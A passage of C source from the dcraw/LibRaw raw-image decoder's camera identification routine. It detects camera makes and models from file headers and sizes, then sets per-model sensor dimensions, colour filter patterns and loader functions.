{ 5939200,2304,1718, 0, 0, 0, 0,30,0x16,0,0,"Olympus","C770UZ" },
{ 3178560,2064,1540, 0, 0, 0, 0, 0,0x94,0,1,"Pentax","Optio S" },
{ 4841984,2090,1544, 0, 0,22, 0, 0,0x94,7,1,"Pentax","Optio S" },
{ 6114240,2346,1737, 0, 0,22, 0, 0,0x94,7,1,"Pentax","Optio S4" },
{ 10702848,3072,2322, 0, 0, 0,21,30,0x94,0,1,"Pentax","Optio 750Z" },
{ 4147200,1920,1080, 0, 0, 0, 0, 0,0x49,0,0,"Photron","BC2-HD" },
{ 4151666,1920,1080, 0, 0, 0, 0, 0,0x49,0,0,"Photron","BC2-HD",8 },
{ 13248000,2208,3000, 0, 0, 0, 0,13,0x61,0,0,"Pixelink","A782" },
{ 6291456,2048,1536, 0, 0, 0, 0,96,0x61,0,0,"RoverShot","3320AF" },
{ 311696, 644, 484, 0, 0, 0, 0, 0,0x16,0,8,"ST Micro","STV680 VGA" },
{ 16098048,3288,2448, 0, 0,24, 0, 9,0x94,0,1,"Samsung","S85" },
{ 16215552,3312,2448, 0, 0,48, 0, 9,0x94,0,1,"Samsung","S85" },
{ 20487168,3648,2808, 0, 0, 0, 0,13,0x94,5,1,"Samsung","WB550" },
{ 24000000,4000,3000, 0, 0, 0, 0,13,0x94,5,1,"Samsung","WB550" },
{ 12582980,3072,2048, 0, 0, 0, 0,33,0x61,0,0,"Sinar","",68 },
{ 33292868,4080,4080, 0, 0, 0, 0,33,0x61,0,0,"Sinar","",68 },
{ 44390468,4080,5440, 0, 0, 0, 0,33,0x61,0,0,"Sinar","",68 },
{ 1409024,1376,1024, 0, 0, 1, 0, 0,0x49,0,0,"Sony","XCD-SX910CR" },
{ 2818048,1376,1024, 0, 0, 1, 0,97,0x49,0,0,"Sony","XCD-SX910CR" },
};
#ifdef LIBRAW_LIBRARY_BUILD
libraw_custom_camera_t
table[64 + sizeof(const_table)/sizeof(const_table[0])];
#endif
static const char *corp[] =
{ "AgfaPhoto", "Canon", "Casio", "Epson", "Fujifilm",
"Mamiya", "Minolta", "Motorola", "Kodak", "Konica", "Leica",
"Nikon", "Nokia", "Olympus", "Pentax", "Phase One", "Ricoh",
"Samsung", "Sigma", "Sinar", "Sony" };
#ifdef LIBRAW_LIBRARY_BUILD
char head[64], *cp;
#else
char head[32], *cp;
#endif
int hlen, flen, fsize, zero_fsize=1, i, c;
struct jhead jh;
#ifdef LIBRAW_LIBRARY_BUILD
unsigned camera_count = parse_custom_cameras(64,table,imgdata.params.custom_camera_strings);
for(int q = 0; q < sizeof(const_table)/sizeof(const_table[0]); q++)
memmove(&table[q+camera_count],&const_table[q],sizeof(const_table[0]));
camera_count += sizeof(const_table)/sizeof(const_table[0]);
#endif
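/* Reset all per-image identification state before probing the file */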
tiff_flip = flip = filters = UINT_MAX; /* unknown */
raw_height = raw_width = fuji_width = fuji_layout = cr2_slice[0] = 0;
maximum = height = width = top_margin = left_margin = 0;
cdesc[0] = desc[0] = artist[0] = make[0] = model[0] = model2[0] = 0;
iso_speed = shutter = aperture = focal_len = unique_id = 0;
tiff_nifds = 0;
memset (tiff_ifd, 0, sizeof tiff_ifd);
memset (gpsdata, 0, sizeof gpsdata);
memset (cblack, 0, sizeof cblack);
memset (white, 0, sizeof white);
memset (mask, 0, sizeof mask);
thumb_offset = thumb_length = thumb_width = thumb_height = 0;
load_raw = thumb_load_raw = 0;
write_thumb = &CLASS jpeg_thumb;
data_offset = meta_offset = meta_length = tiff_bps = tiff_compress = 0;
kodak_cbpp = zero_after_ff = dng_version = load_flags = 0;
timestamp = shot_order = tiff_samples = black = is_foveon = 0;
mix_green = profile_length = data_error = zero_is_bad = 0;
pixel_aspect = is_raw = raw_color = 1;
tile_width = tile_length = 0;
for (i=0; i < 4; i++) {
cam_mul[i] = i == 1;
pre_mul[i] = i < 3;
FORC3 cmatrix[c][i] = 0;
FORC3 rgb_cam[c][i] = c == i;
}
colors = 3;
for (i=0; i < 0x10000; i++) curve[i] = i;
order = get2();
hlen = get4();
fseek (ifp, 0, SEEK_SET);
#ifdef LIBRAW_LIBRARY_BUILD
fread (head, 1, 64, ifp);
libraw_internal_data.unpacker_data.lenRAFData = libraw_internal_data.unpacker_data.posRAFData = 0;
#else
fread (head, 1, 32, ifp);
#endif
fseek (ifp, 0, SEEK_END);
flen = fsize = ftell(ifp);
if ((cp = (char *) memmem (head, 32, (char*)"MMMM", 4)) ||
(cp = (char *) memmem (head, 32, (char*)"IIII", 4))) {
parse_phase_one (cp-head);
if (cp-head && parse_tiff(0)) apply_tiff();
} else if (order == 0x4949 || order == 0x4d4d) {
if (!memcmp (head+6,"HEAPCCDR",8)) {
data_offset = hlen;
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
#endif
parse_ciff (hlen, flen-hlen, 0);
load_raw = &CLASS canon_load_raw;
} else if (parse_tiff(0)) apply_tiff();
} else if (!memcmp (head,"\xff\xd8\xff\xe1",4) &&
!memcmp (head+6,"Exif",4)) {
fseek (ifp, 4, SEEK_SET);
data_offset = 4 + get2();
fseek (ifp, data_offset, SEEK_SET);
if (fgetc(ifp) != 0xff)
parse_tiff(12);
thumb_offset = 0;
} else if (!memcmp (head+25,"ARECOYK",7)) {
strcpy (make, "Contax");
strcpy (model,"N Digital");
fseek (ifp, 33, SEEK_SET);
get_timestamp(1);
fseek (ifp, 52, SEEK_SET);
switch (get4()) {
case 7: iso_speed = 25; break;
case 8: iso_speed = 32; break;
case 9: iso_speed = 40; break;
case 10: iso_speed = 50; break;
case 11: iso_speed = 64; break;
case 12: iso_speed = 80; break;
case 13: iso_speed = 100; break;
case 14: iso_speed = 125; break;
case 15: iso_speed = 160; break;
case 16: iso_speed = 200; break;
case 17: iso_speed = 250; break;
case 18: iso_speed = 320; break;
case 19: iso_speed = 400; break;
}
shutter = libraw_powf64(2.0f, (((float)get4())/8.0f)) / 16000.0f;
FORC4 cam_mul[c ^ (c >> 1)] = get4();
fseek (ifp, 88, SEEK_SET);
aperture = libraw_powf64(2.0f, ((float)get4())/16.0f);
fseek (ifp, 112, SEEK_SET);
focal_len = get4();
#ifdef LIBRAW_LIBRARY_BUILD
fseek (ifp, 104, SEEK_SET);
imgdata.lens.makernotes.MaxAp4CurFocal = libraw_powf64(2.0f, ((float)get4())/16.0f);
fseek (ifp, 124, SEEK_SET);
stmread(imgdata.lens.makernotes.Lens, 32, ifp);
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Contax_N;
if (imgdata.lens.makernotes.Lens[0])
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Contax_N;
#endif
} else if (!strcmp (head, "PXN")) {
strcpy (make, "Logitech");
strcpy (model,"Fotoman Pixtura");
} else if (!strcmp (head, "qktk")) {
strcpy (make, "Apple");
strcpy (model,"QuickTake 100");
load_raw = &CLASS quicktake_100_load_raw;
} else if (!strcmp (head, "qktn")) {
strcpy (make, "Apple");
strcpy (model,"QuickTake 150");
load_raw = &CLASS kodak_radc_load_raw;
} else if (!memcmp (head,"FUJIFILM",8)) {
#ifdef LIBRAW_LIBRARY_BUILD
strcpy(model, head+0x1c);
memcpy(model2, head+0x3c, 4);
model2[4]=0;
#endif
fseek (ifp, 84, SEEK_SET);
thumb_offset = get4();
thumb_length = get4();
fseek (ifp, 92, SEEK_SET);
parse_fuji (get4());
if (thumb_offset > 120) {
fseek (ifp, 120, SEEK_SET);
is_raw += (i = get4())?1:0;
if (is_raw == 2 && shot_select)
parse_fuji (i);
}
load_raw = &CLASS unpacked_load_raw;
fseek (ifp, 100+28*(shot_select > 0), SEEK_SET);
parse_tiff (data_offset = get4());
parse_tiff (thumb_offset+12);
apply_tiff();
} else if (!memcmp (head,"RIFF",4)) {
fseek (ifp, 0, SEEK_SET);
parse_riff();
} else if (!memcmp (head+4,"ftypqt   ",9)) {
fseek (ifp, 0, SEEK_SET);
parse_qt (fsize);
is_raw = 0;
} else if (!memcmp (head,"\0\001\0\001\0@",6)) {
fseek (ifp, 6, SEEK_SET);
fread (make, 1, 8, ifp);
fread (model, 1, 8, ifp);
fread (model2, 1, 16, ifp);
data_offset = get2();
get2();
raw_width = get2();
raw_height = get2();
load_raw = &CLASS nokia_load_raw;
filters = 0x61616161;
} else if (!memcmp (head,"NOKIARAW",8)) {
strcpy (make, "NOKIA");
order = 0x4949;
fseek (ifp, 300, SEEK_SET);
data_offset = get4();
i = get4();
width = get2();
height = get2();
#ifdef LIBRAW_LIBRARY_BUILD
// data length should be in range w*h..w*h*2
if(width*height < (LIBRAW_MAX_ALLOC_MB*1024*512L) && width*height>1
&& i >= width * height && i <= width*height*2)
{
#endif
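/* Payload length divided by pixel count gives bits per sample: 8-bit flat or 10-bit packed */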
switch (tiff_bps = i*8 / (width * height)) {
case 8: load_raw = &CLASS eight_bit_load_raw; break;
case 10: load_raw = &CLASS nokia_load_raw;
}
raw_height = height + (top_margin = i / (width * tiff_bps/8) - height);
mask[0][3] = 1;
filters = 0x61616161;
#ifdef LIBRAW_LIBRARY_BUILD
}
else
is_raw = 0;
#endif
} else if (!memcmp (head,"ARRI",4)) {
order = 0x4949;
fseek (ifp, 20, SEEK_SET);
width = get4();
height = get4();
strcpy (make, "ARRI");
fseek (ifp, 668, SEEK_SET);
fread (model, 1, 64, ifp);
data_offset = 4096;
load_raw = &CLASS packed_load_raw;
load_flags = 88;
filters = 0x61616161;
} else if (!memcmp (head,"XPDS",4)) {
order = 0x4949;
fseek (ifp, 0x800, SEEK_SET);
fread (make, 1, 41, ifp);
raw_height = get2();
raw_width = get2();
fseek (ifp, 56, SEEK_CUR);
fread (model, 1, 30, ifp);
data_offset = 0x10000;
load_raw = &CLASS canon_rmf_load_raw;
gamma_curve (0, 12.25, 1, 1023);
} else if (!memcmp (head+4,"RED1",4)) {
strcpy (make, "Red");
strcpy (model,"One");
parse_redcine();
load_raw = &CLASS redcine_load_raw;
gamma_curve (1/2.4, 12.92, 1, 4095);
filters = 0x49494949;
} else if (!memcmp (head,"DSC-Image",9))
parse_rollei();
else if (!memcmp (head,"PWAD",4))
parse_sinar_ia();
else if (!memcmp (head,"\0MRM",4))
parse_minolta(0);
else if (!memcmp (head,"FOVb",4))
{
#ifdef LIBRAW_LIBRARY_BUILD
#ifdef LIBRAW_DEMOSAIC_PACK_GPL2
if(!(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_FORCE_FOVEON_X3F))
parse_foveon();
else
#endif
parse_x3f();
#else
#ifdef LIBRAW_DEMOSAIC_PACK_GPL2
parse_foveon();
#endif
#endif
}
else if (!memcmp (head,"CI",2))
parse_cine();
if(make[0] == 0)
#ifdef LIBRAW_LIBRARY_BUILD
for (zero_fsize=i=0; i < camera_count; i++)
#else
for (zero_fsize=i=0; i < sizeof table / sizeof *table; i++)
#endif
if (fsize == table[i].fsize) {
strcpy (make, table[i].t_make );
#ifdef LIBRAW_LIBRARY_BUILD
if (!strncmp(make, "Canon",5))
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
}
#endif
strcpy (model, table[i].t_model);
flip = table[i].flags >> 2;
zero_is_bad = table[i].flags & 2;
if (table[i].flags & 1)
parse_external_jpeg();
data_offset = table[i].offset == 0xffff?0:table[i].offset;
raw_width = table[i].rw;
raw_height = table[i].rh;
left_margin = table[i].lm;
top_margin = table[i].tm;
width = raw_width - left_margin - table[i].rm;
height = raw_height - top_margin - table[i].bm;
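/* Replicate the one-byte CFA code into the full 32-bit pattern; colors stays 4 only if the pattern uses the fourth color code */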
filters = 0x1010101 * table[i].cf;
colors = 4 - !((filters & filters >> 1) & 0x5555);
load_flags = table[i].lf;
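/* Infer bits per pixel from the payload: (file size - data offset) in bits over the pixel count */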
switch (tiff_bps = (fsize-data_offset)*8 / (raw_width*raw_height)) {
case 6:
load_raw = &CLASS minolta_rd175_load_raw; break;
case 8:
load_raw = &CLASS eight_bit_load_raw; break;
case 10:
if ((fsize-data_offset)/raw_height*3 >= raw_width*4) {
load_raw = &CLASS android_loose_load_raw; break;
} else if (load_flags & 1) {
load_raw = &CLASS android_tight_load_raw; break;
}
case 12:
load_flags |= 128;
load_raw = &CLASS packed_load_raw; break;
case 16:
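/* load_flags bit 0 selects byte order: 0x4949|0x404 == 0x4d4d, i.e. big-endian samples */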
order = 0x4949 | 0x404 * (load_flags & 1);
tiff_bps -= load_flags >> 4;
tiff_bps -= load_flags = load_flags >> 1 & 7;
load_raw = table[i].offset == 0xffff ? &CLASS unpacked_load_raw_reversed : &CLASS unpacked_load_raw;
}
maximum = (1 << tiff_bps) - (1 << table[i].max);
}
if (zero_fsize) fsize = 0;
if (make[0] == 0) parse_smal (0, flen);
if (make[0] == 0) {
parse_jpeg(0);
fseek(ifp,0,SEEK_END);
int sz = ftell(ifp);
#ifdef LIBRAW_LIBRARY_BUILD
if (!strncmp(model,"RP_imx219",9) && sz >= 0x9cb600 &&
!fseek (ifp, -0x9cb600, SEEK_END) &&
fread (head, 1, 0x20, ifp) && !strncmp(head, "BRCM", 4)) {
strcpy (make, "Broadcom");
strcpy (model, "RPi IMX219");
if (raw_height > raw_width) flip = 5;
data_offset = ftell(ifp) + 0x8000 - 0x20;
parse_broadcom();
black = 66;
maximum = 0x3ff;
load_raw = &CLASS broadcom_load_raw;
thumb_offset = 0;
thumb_length = sz - 0x9cb600 - 1;
} else
if (!(strncmp(model,"ov5647",6) && strncmp(model,"RP_OV5647",9)) && sz >= 0x61b800 &&
!fseek (ifp, -0x61b800, SEEK_END) &&
fread (head, 1, 0x20, ifp) && !strncmp(head, "BRCM", 4)) {
strcpy (make, "Broadcom");
if (!strncmp(model,"ov5647",6))
strcpy (model, "RPi OV5647 v.1");
else
strcpy (model, "RPi OV5647 v.2");
if (raw_height > raw_width) flip = 5;
data_offset = ftell(ifp) + 0x8000 - 0x20;
parse_broadcom();
black = 16;
maximum = 0x3ff;
load_raw = &CLASS broadcom_load_raw;
thumb_offset = 0;
thumb_length = sz - 0x61b800 - 1;
#else
if (!(strncmp(model,"ov",2) && strncmp(model,"RP_OV",5)) && sz>=6404096 &&
!fseek (ifp, -6404096, SEEK_END) &&
fread (head, 1, 32, ifp) && !strcmp(head,"BRCMn")) {
strcpy (make, "OmniVision");
data_offset = ftell(ifp) + 0x8000-32;
width = raw_width;
raw_width = 2611;
load_raw = &CLASS nokia_load_raw;
filters = 0x16161616;
#endif
} else is_raw = 0;
}
#ifdef LIBRAW_LIBRARY_BUILD
// make sure strings are terminated
desc[511] = artist[63] = make[63] = model[63] = model2[63] = 0;
#endif
for (i=0; i < sizeof corp / sizeof *corp; i++)
if (strcasestr (make, corp[i])) /* Simplify company names */
strcpy (make, corp[i]);
if ((!strncmp(make,"Kodak",5) || !strncmp(make,"Leica",5)) &&
((cp = strcasestr(model," DIGITAL CAMERA")) ||
(cp = strstr(model,"FILE VERSION"))))
*cp = 0;
if (!strncasecmp(model,"PENTAX",6))
strcpy (make, "Pentax");
#ifdef LIBRAW_LIBRARY_BUILD
remove_trailing_spaces(make,sizeof(make));
remove_trailing_spaces(model,sizeof(model));
#else
cp = make + strlen(make); /* Remove trailing spaces */
while (*--cp == ' ') *cp = 0;
cp = model + strlen(model);
while (*--cp == ' ') *cp = 0;
#endif
i = strbuflen(make); /* Remove make from model */
if (!strncasecmp (model, make, i) && model[i++] == ' ')
memmove (model, model+i, 64-i);
if (!strncmp (model,"FinePix ",8))
strcpy (model, model+8);
if (!strncmp (model,"Digital Camera ",15))
strcpy (model, model+15);
desc[511] = artist[63] = make[63] = model[63] = model2[63] = 0;
if (!is_raw) goto notraw;
if (!height) height = raw_height;
if (!width) width = raw_width;
if (height == 2624 && width == 3936) /* Pentax K10D and Samsung GX10 */
{ height = 2616; width = 3896; }
if (height == 3136 && width == 4864) /* Pentax K20D and Samsung GX20 */
{ height = 3124; width = 4688; filters = 0x16161616; }
if (width == 4352 && (!strcmp(model,"K-r") || !strcmp(model,"K-x")))
{ width = 4309; filters = 0x16161616; }
if (width >= 4960 && !strncmp(model,"K-5",3))
{ left_margin = 10; width = 4950; filters = 0x16161616; }
if (width == 6080 && !strcmp(model,"K-70"))
{ height = 4016; top_margin=32; width=6020; left_margin = 60; }
if (width == 4736 && !strcmp(model,"K-7"))
{ height = 3122; width = 4684; filters = 0x16161616; top_margin = 2; }
if (width == 6080 && !strcmp(model,"K-3 II")) /* moved back */
{ left_margin = 4; width = 6040; }
if (width == 6080 && !strcmp(model,"K-3"))
{ left_margin = 4; width = 6040; }
if (width == 7424 && !strcmp(model,"645D"))
{ height = 5502; width = 7328; filters = 0x61616161; top_margin = 29;
left_margin = 48; }
if (height == 3014 && width == 4096) /* Ricoh GX200 */
width = 4014;
if (dng_version) {
if (filters == UINT_MAX) filters = 0;
if (filters) is_raw *= tiff_samples;
else colors = tiff_samples;
switch (tiff_compress) {
case 0: /* Compression not set, assuming uncompressed */
case 1: load_raw = &CLASS packed_dng_load_raw; break;
case 7: load_raw = &CLASS lossless_dng_load_raw; break;
#ifdef LIBRAW_LIBRARY_BUILD
case 8: load_raw = &CLASS deflate_dng_load_raw; break;
#endif
case 34892: load_raw = &CLASS lossy_dng_load_raw; break;
default: load_raw = 0;
}
if (!strncmp(make, "Canon",5) && unique_id)
{
for (i = 0; i < sizeof unique / sizeof *unique; i++)
if (unique_id == 0x80000000 + unique[i].id)
{
strcpy(model, unique[i].t_model);
break;
}
}
if (!strncasecmp(make, "Sony",4) && unique_id)
{
for (i = 0; i < sizeof sonique / sizeof *sonique; i++)
if (unique_id == sonique[i].id)
{
strcpy(model, sonique[i].t_model);
break;
}
}
goto dng_skip;
}
if (!strncmp(make,"Canon",5) && !fsize && tiff_bps != 15) {
if (!load_raw)
load_raw = &CLASS lossless_jpeg_load_raw;
for (i=0; i < sizeof canon / sizeof *canon; i++)
if (raw_width == canon[i][0] && raw_height == canon[i][1]) {
width = raw_width - (left_margin = canon[i][2]);
height = raw_height - (top_margin = canon[i][3]);
width -= canon[i][4];
height -= canon[i][5];
mask[0][1] = canon[i][6];
mask[0][3] = -canon[i][7];
mask[1][1] = canon[i][8];
mask[1][3] = -canon[i][9];
if (canon[i][10]) filters = canon[i][10] * 0x01010101;
}
if ((unique_id | 0x20000) == 0x2720000) {
left_margin = 8;
top_margin = 16;
}
}
if (!strncmp(make,"Canon",5) && unique_id)
{
for (i=0; i < sizeof unique / sizeof *unique; i++)
if (unique_id == 0x80000000 + unique[i].id)
{
adobe_coeff ("Canon", unique[i].t_model);
strcpy(model,unique[i].t_model);
}
}
if (!strncasecmp(make,"Sony",4) && unique_id)
{
for (i=0; i < sizeof sonique / sizeof *sonique; i++)
if (unique_id == sonique[i].id)
{
adobe_coeff ("Sony", sonique[i].t_model);
strcpy(model,sonique[i].t_model);
}
}
if (!strncmp(make,"Nikon",5)) {
if (!load_raw)
load_raw = &CLASS packed_load_raw;
if (model[0] == 'E')
load_flags |= !data_offset << 2 | 2;
}
/* Set parameters based on camera name (for non-DNG files). */
if (!strcmp(model,"KAI-0340")
&& find_green (16, 16, 3840, 5120) < 25) {
height = 480;
top_margin = filters = 0;
strcpy (model,"C603");
}
if (!strcmp(make, "Sony") && raw_width > 3888 && !black && !cblack[0])
black = 128 << (tiff_bps - 12);
if (is_foveon) {
if (height*2 < width) pixel_aspect = 0.5;
if (height > width) pixel_aspect = 2;
filters = 0;
#ifdef LIBRAW_DEMOSAIC_PACK_GPL2
if(!(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_FORCE_FOVEON_X3F))
simple_coeff(0);
#endif
}
else if(!strncmp(make,"Pentax",6))
{
if(!strncmp(model,"K-1",3))
{
top_margin = 18;
height = raw_height - top_margin;
if(raw_width == 7392)
{
left_margin = 6;
width = 7376;
}
}
}
else if (!strncmp(make,"Canon",5) && tiff_bps == 15) {
switch (width) {
case 3344: width -= 66;
case 3872: width -= 6;
}
if (height > width) {
SWAP(height,width);
SWAP(raw_height,raw_width);
}
if (width == 7200 && height == 3888)
{
raw_width = width = 6480;
raw_height = height = 4320;
}
filters = 0;
tiff_samples = colors = 3;
load_raw = &CLASS canon_sraw_load_raw;
} else if (!strcmp(model,"PowerShot 600")) {
height = 613;
width = 854;
raw_width = 896;
colors = 4;
filters = 0xe1e4e1e4;
load_raw = &CLASS canon_600_load_raw;
} else if (!strcmp(model,"PowerShot A5") ||
!strcmp(model,"PowerShot A5 Zoom")) {
height = 773;
width = 960;
raw_width = 992;
pixel_aspect = 256/235.0;
filters = 0x1e4e1e4e;
goto canon_a5;
} else if (!strcmp(model,"PowerShot A50")) {
height = 968;
width = 1290;
raw_width = 1320;
filters = 0x1b4e4b1e;
goto canon_a5;
} else if (!strcmp(model,"PowerShot Pro70")) {
height = 1024;
width = 1552;
filters = 0x1e4b4e1b;
canon_a5:
colors = 4;
tiff_bps = 10;
load_raw = &CLASS packed_load_raw;
load_flags = 40;
} else if (!strcmp(model,"PowerShot Pro90 IS") ||
!strcmp(model,"PowerShot G1")) {
colors = 4;
filters = 0xb4b4b4b4;
} else if (!strcmp(model,"PowerShot A610")) {
if (canon_s2is()) strcpy (model+10, "S2 IS");
} else if (!strcmp(model,"PowerShot SX220 HS")) {
mask[1][3] = -4;
top_margin=16;
left_margin = 92;
} else if (!strcmp(model,"PowerShot S120")) {
raw_width = 4192;
raw_height = 3062;
width = 4022;
height = 3016;
mask[0][0] = top_margin = 31;
mask[0][2] = top_margin + height;
left_margin = 120;
mask[0][1] = 23;
mask[0][3] = 72;
} else if (!strcmp(model,"PowerShot G16")) {
mask[0][0] = 0;
mask[0][2] = 80;
mask[0][1] = 0;
mask[0][3] = 16;
top_margin = 29;
left_margin = 120;
width = raw_width-left_margin-48;
height = raw_height-top_margin-14;
} else if (!strcmp(model,"PowerShot SX50 HS")) {
top_margin = 17;
} else if (!strcmp(model,"EOS D2000C")) {
filters = 0x61616161;
black = curve[200];
} else if (!strcmp(model,"D1")) {
cam_mul[0] *= 256/527.0;
cam_mul[2] *= 256/317.0;
} else if (!strcmp(model,"D1X")) {
width -= 4;
pixel_aspect = 0.5;
} else if (!strcmp(model,"D40X") ||
!strcmp(model,"D60") ||
!strcmp(model,"D80") ||
!strcmp(model,"D3000")) {
height -= 3;
width -= 4;
} else if (!strcmp(model,"D3") ||
!strcmp(model,"D3S") ||
!strcmp(model,"D700")) {
width -= 4;
left_margin = 2;
} else if (!strcmp(model,"D3100")) {
width -= 28;
left_margin = 6;
} else if (!strcmp(model,"D5000") ||
!strcmp(model,"D90")) {
width -= 42;
} else if (!strcmp(model,"D5100") ||
!strcmp(model,"D7000") ||
!strcmp(model,"COOLPIX A")) {
width -= 44;
} else if (!strcmp(model,"D3200") ||
!strncmp(model,"D6",2) ||
!strncmp(model,"D800",4)) {
width -= 46;
} else if (!strcmp(model,"D4") ||
!strcmp(model,"Df")) {
width -= 52;
left_margin = 2;
} else if (!strncmp(model,"D40",3) ||
!strncmp(model,"D50",3) ||
!strncmp(model,"D70",3)) {
width--;
} else if (!strcmp(model,"D100")) {
if (load_flags)
raw_width = (width += 3) + 3;
} else if (!strcmp(model,"D200")) {
left_margin = 1;
width -= 4;
filters = 0x94949494;
} else if (!strncmp(model,"D2H",3)) {
left_margin = 6;
width -= 14;
} else if (!strncmp(model,"D2X",3)) {
if (width == 3264) width -= 32;
else width -= 8;
} else if (!strncmp(model,"D300",4)) {
width -= 32;
} else if (!strncmp(make,"Nikon",5) && raw_width == 4032) {
if(!strcmp(model,"COOLPIX P7700"))
{
adobe_coeff ("Nikon","COOLPIX P7700");
maximum = 65504;
load_flags = 0;
}
else if(!strcmp(model,"COOLPIX P7800"))
{
adobe_coeff ("Nikon","COOLPIX P7800");
maximum = 65504;
load_flags = 0;
}
else if(!strcmp(model,"COOLPIX P340"))
load_flags=0;
} else if (!strncmp(model,"COOLPIX P",9) && raw_width != 4032) {
load_flags = 24;
filters = 0x94949494;
if (model[9] == '7' && (iso_speed >= 400 || iso_speed==0) && !strstr(software,"V1.2") )
black = 255;
} else if (!strncmp(model,"1 ",2)) {
height -= 2;
} else if (fsize == 1581060) {
simple_coeff(3);
pre_mul[0] = 1.2085;
pre_mul[1] = 1.0943;
pre_mul[3] = 1.1103;
} else if (fsize == 3178560) {
cam_mul[0] *= 4;
cam_mul[2] *= 4;
} else if (fsize == 4771840) {
if (!timestamp && nikon_e995())
strcpy (model, "E995");
if (strcmp(model,"E995")) {
filters = 0xb4b4b4b4;
simple_coeff(3);
pre_mul[0] = 1.196;
pre_mul[1] = 1.246;
pre_mul[2] = 1.018;
}
} else if (fsize == 2940928) {
if (!timestamp && !nikon_e2100())
strcpy (model,"E2500");
if (!strcmp(model,"E2500")) {
height -= 2;
load_flags = 6;
colors = 4;
filters = 0x4b4b4b4b;
}
} else if (fsize == 4775936) {
if (!timestamp) nikon_3700();
if (model[0] == 'E' && atoi(model+1) < 3700)
filters = 0x49494949;
if (!strcmp(model,"Optio 33WR")) {
flip = 1;
filters = 0x16161616;
}
if (make[0] == 'O') {
i = find_green (12, 32, 1188864, 3576832);
c = find_green (12, 32, 2383920, 2387016);
if (abs(i) < abs(c)) {
SWAP(i,c);
load_flags = 24;
}
if (i < 0) filters = 0x61616161;
}
} else if (fsize == 5869568) {
if (!timestamp && minolta_z2()) {
strcpy (make, "Minolta");
strcpy (model,"DiMAGE Z2");
}
load_flags = 6 + 24*(make[0] == 'M');
} else if (fsize == 6291456) {
fseek (ifp, 0x300000, SEEK_SET);
if ((order = guess_byte_order(0x10000)) == 0x4d4d) {
height -= (top_margin = 16);
width -= (left_margin = 28);
maximum = 0xf5c0;
strcpy (make, "ISG");
model[0] = 0;
}
} else if (!strncmp(make,"Fujifilm",8)) {
if (!strcmp(model+7,"S2Pro")) {
strcpy (model,"S2Pro");
height = 2144;
width = 2880;
flip = 6;
} else if (load_raw != &CLASS packed_load_raw)
maximum = (is_raw == 2 && shot_select) ? 0x2f00 : 0x3e00;
top_margin = (raw_height - height) >> 2 << 1;
left_margin = (raw_width - width ) >> 2 << 1;
if (width == 2848 || width == 3664) filters = 0x16161616;
if (width == 4032 || width == 4952) left_margin = 0;
if (width == 3328 && (width -= 66)) left_margin = 34;
if (width == 4936) left_margin = 4;
if (width == 6032) left_margin = 0;
if (!strcmp(model,"HS50EXR") ||
!strcmp(model,"F900EXR")) {
width += 2;
left_margin = 0;
filters = 0x16161616;
}
if(!strcmp(model,"S5500"))
{
height -= (top_margin=6);
}
if (fuji_layout) raw_width *= is_raw;
if (filters == 9)
FORC(36) ((char *)xtrans)[c] =
xtrans_abs[(c/6+top_margin) % 6][(c+left_margin) % 6];
} else if (!strcmp(model,"KD-400Z")) {
height = 1712;
width = 2312;
raw_width = 2336;
goto konica_400z;
} else if (!strcmp(model,"KD-510Z")) {
goto konica_510z;
} else if (!strncasecmp(make,"Minolta",7)) {
if (!load_raw && (maximum = 0xfff))
load_raw = &CLASS unpacked_load_raw;
if (!strncmp(model,"DiMAGE A",8)) {
if (!strcmp(model,"DiMAGE A200"))
filters = 0x49494949;
tiff_bps = 12;
load_raw = &CLASS packed_load_raw;
} else if (!strncmp(model,"ALPHA",5) ||
!strncmp(model,"DYNAX",5) ||
!strncmp(model,"MAXXUM",6)) {
sprintf (model+20, "DYNAX %-10s", model+6+(model[0]=='M'));
adobe_coeff (make, model+20);
load_raw = &CLASS packed_load_raw;
} else if (!strncmp(model,"DiMAGE G",8)) {
if (model[8] == '4') {
height = 1716;
width = 2304;
} else if (model[8] == '5') {
konica_510z:
height = 1956;
width = 2607;
raw_width = 2624;
} else if (model[8] == '6') {
height = 2136;
width = 2848;
}
data_offset += 14;
filters = 0x61616161;
konica_400z:
load_raw = &CLASS unpacked_load_raw;
maximum = 0x3df;
order = 0x4d4d;
}
} else if (!strcmp(model,"*ist D")) {
load_raw = &CLASS unpacked_load_raw;
data_error = -1;
} else if (!strcmp(model,"*ist DS")) {
height -= 2;
} else if (!strncmp(make,"Samsung",7) && raw_width == 4704) {
height -= top_margin = 8;
width -= 2 * (left_margin = 8);
load_flags = 32;
} else if (!strncmp(make,"Samsung",7) && !strcmp(model,"NX3000")) {
top_margin = 24;
left_margin = 64;
width = 5472;
height = 3648;
filters = 0x61616161;
colors = 3;
} else if (!strncmp(make,"Samsung",7) && raw_height == 3714) {
height -= top_margin = 18;
left_margin = raw_width - (width = 5536);
if (raw_width != 5600)
left_margin = top_margin = 0;
filters = 0x61616161;
colors = 3;
} else if (!strncmp(make,"Samsung",7) && raw_width == 5632) {
order = 0x4949;
height = 3694;
top_margin = 2;
width = 5574 - (left_margin = 32 + tiff_bps);
if (tiff_bps == 12) load_flags = 80;
} else if (!strncmp(make,"Samsung",7) && raw_width == 5664) {
height -= top_margin = 17;
left_margin = 96;
width = 5544;
filters = 0x49494949;
} else if (!strncmp(make,"Samsung",7) && raw_width == 6496) {
filters = 0x61616161;
#ifdef LIBRAW_LIBRARY_BUILD
if(!black && !cblack[0] && !cblack[1] && !cblack[2] && !cblack[3])
#endif
black = 1 << (tiff_bps - 7);
} else if (!strcmp(model,"EX1")) {
order = 0x4949;
height -= 20;
top_margin = 2;
if ((width -= 6) > 3682) {
height -= 10;
width -= 46;
top_margin = 8;
}
} else if (!strcmp(model,"WB2000")) {
order = 0x4949;
height -= 3;
top_margin = 2;
if ((width -= 10) > 3718) {
height -= 28;
width -= 56;
top_margin = 8;
}
} else if (strstr(model,"WB550")) {
strcpy (model, "WB550");
} else if (!strcmp(model,"EX2F")) {
height = 3030;
width = 4040;
top_margin = 15;
left_margin=24;
order = 0x4949;
filters = 0x49494949;
